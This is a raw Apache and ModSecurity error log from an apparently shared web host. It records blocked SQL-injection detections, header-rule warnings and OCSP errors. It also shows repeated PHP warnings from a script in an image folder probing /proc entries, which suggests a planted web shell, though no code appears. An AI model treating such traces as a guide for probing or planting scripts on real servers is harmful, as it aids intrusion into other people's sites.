[Mon May 11 22:18:36.222419 2026] [security2:error] [pid 1606352:tid 1606420] [client 43.158.91.71:59222] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agI5nHo_DFxNSZVmaX3MwwAAAME"]
[Mon May 11 22:18:39.198519 2026] [security2:error] [pid 1601130:tid 1601174] [client 43.158.91.71:46500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agI5n3EgAO_835W6c1mTmQAAAFg"], referer: http://pole-mobilite-regional.com
[Mon May 11 22:18:39.827595 2026] [authz_core:error] [pid 1605480:tid 1605529] [client 95.111.239.37:50280] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 22:18:41.153259 2026] [security2:error] [pid 1605480:tid 1605526] [client 43.158.91.71:50346] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agI5oR2Cvzd_nyNfUm_77wAAAQQ"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 22:19:08.057702 2026] [ssl:error] [pid 1590352:tid 1590404] (EAI 2)Name or service not known: [client 107.170.15.39:42444] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:08.057749 2026] [ssl:error] [pid 1590352:tid 1590404] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:09.284362 2026] [ssl:error] [pid 1606352:tid 1606420] (EAI 2)Name or service not known: [client 45.157.74.119:39485] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:09.284412 2026] [ssl:error] [pid 1606352:tid 1606420] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:12.371425 2026] [ssl:error] [pid 1590352:tid 1590401] (EAI 2)Name or service not known: [client 178.171.57.161:46715] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:12.371470 2026] [ssl:error] [pid 1590352:tid 1590401] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/200/task/200/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/200/task/200/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/200/task/200/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/200/task/200/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/200/task/200/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/200/task/200/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/557/task/557/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:18.854214 2026] [ssl:error] [pid 1588898:tid 1588900] (EAI 2)Name or service not known: [client 45.76.15.149:36276] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:18.854248 2026] [ssl:error] [pid 1588898:tid 1588900] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:19.373644 2026] [ssl:error] [pid 1590352:tid 1590403] (EAI 2)Name or service not known: [client 176.53.216.91:35711] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:19.373673 2026] [ssl:error] [pid 1590352:tid 1590403] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/99/task/99/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/99/task/99/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/99/task/99/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/99/task/99/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/99/task/99/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/99/task/99/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/81/task/81/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/81/task/81/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/81/task/81/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:22.336806 2026] [ssl:error] [pid 1534836:tid 1534885] (EAI 2)Name or service not known: [client 124.68.59.46:32797] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:22.336850 2026] [ssl:error] [pid 1534836:tid 1534885] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:28.206329 2026] [ssl:error] [pid 1601130:tid 1601154] (EAI 2)Name or service not known: [client 146.190.215.245:44756] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:28.206362 2026] [ssl:error] [pid 1601130:tid 1601154] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/31/task/31/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/31/task/31/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/31/task/31/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:31.033248 2026] [ssl:error] [pid 1534836:tid 1534876] (EAI 2)Name or service not known: [client 94.139.236.108:38943] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:31.033277 2026] [ssl:error] [pid 1534836:tid 1534876] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:31.045521 2026] [security2:error] [pid 1606352:tid 1606432] [client 43.135.142.7:45094] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agI503o_DFxNSZVmaX3NEgAAAM0"]
PHP Warning:  filesize(): stat failed for /proc/954/task/954/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/954/task/954/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/954/task/954/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/954/task/954/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/954/task/954/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/954/task/954/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/595/task/595/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/595/task/595/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/595/task/595/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:31.790882 2026] [ssl:error] [pid 1601130:tid 1601161] (EAI 2)Name or service not known: [client 31.98.169.49:34643] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:31.790918 2026] [ssl:error] [pid 1601130:tid 1601161] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/113/task/113/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/113/task/113/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/113/task/113/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/113/task/113/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:32.383603 2026] [ssl:error] [pid 1605480:tid 1605539] (EAI 2)Name or service not known: [client 67.197.75.35:37511] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:32.383640 2026] [ssl:error] [pid 1605480:tid 1605539] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/854/task/854/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/854/task/854/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/854/task/854/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:35.254578 2026] [security2:error] [pid 1601130:tid 1601164] [client 43.135.142.7:35102] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agI513EgAO_835W6c1mUKAAAAE4"], referer: http://rixonephotography.com
PHP Warning:  filesize(): stat failed for /proc/556/task/556/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/556/task/556/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/556/task/556/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/556/task/556/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/556/task/556/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/556/task/556/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:19:36.916574 2026] [ssl:error] [pid 1534836:tid 1534887] (EAI 2)Name or service not known: [client 68.183.140.54:46914] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:36.916613 2026] [ssl:error] [pid 1534836:tid 1534887] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:39.680919 2026] [ssl:error] [pid 1534836:tid 1534893] (EAI 2)Name or service not known: [client 209.242.213.244:38491] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:39.680973 2026] [ssl:error] [pid 1534836:tid 1534893] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:42.418846 2026] [ssl:error] [pid 1590352:tid 1590393] (EAI 2)Name or service not known: [client 69.17.113.183:45673] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:42.418870 2026] [ssl:error] [pid 1590352:tid 1590393] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:42.966891 2026] [ssl:error] [pid 1605480:tid 1605526] (EAI 2)Name or service not known: [client 87.89.13.156:39115] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:19:42.966926 2026] [ssl:error] [pid 1605480:tid 1605526] AH01941: stapling_renew_response: responder error
[Mon May 11 22:19:42.971509 2026] [security2:error] [pid 1534836:tid 1534880] [client 129.226.83.4:44242] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI53teaRXe5lR8y0ZOyywAAAUk"]
[Mon May 11 22:19:46.650024 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI54qFW67LJTsgN3jQJ8QAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:46.650381 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI54qFW67LJTsgN3jQJ8QAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:47.926377 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI54qFW67LJTsgN3jQJ8QAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:48.339515 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55KFW67LJTsgN3jQJ9AAAAAg"], referer: https://t.co/
[Mon May 11 22:19:48.339928 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55KFW67LJTsgN3jQJ9AAAAAg"], referer: https://t.co/
[Mon May 11 22:19:49.082529 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI55KFW67LJTsgN3jQJ9AAAAAg"], referer: https://t.co/
[Mon May 11 22:19:49.358367 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55aFW67LJTsgN3jQJ9gAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:49.358704 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55aFW67LJTsgN3jQJ9gAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:50.243747 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI55aFW67LJTsgN3jQJ9gAAAAg"], referer: https://www.bing.com/
[Mon May 11 22:19:50.438576 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55qFW67LJTsgN3jQJ-AAAAAg"], referer: https://duckduckgo.com/
[Mon May 11 22:19:50.438948 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI55qFW67LJTsgN3jQJ-AAAAAg"], referer: https://duckduckgo.com/
[Mon May 11 22:19:51.251072 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI55qFW67LJTsgN3jQJ-AAAAAg"], referer: https://duckduckgo.com/
[Mon May 11 22:19:51.447673 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI556FW67LJTsgN3jQJ-gAAAAg"], referer: https://www.google.com/
[Mon May 11 22:19:51.448016 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI556FW67LJTsgN3jQJ-gAAAAg"], referer: https://www.google.com/
[Mon May 11 22:19:52.254322 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI556FW67LJTsgN3jQJ-gAAAAg"], referer: https://www.google.com/
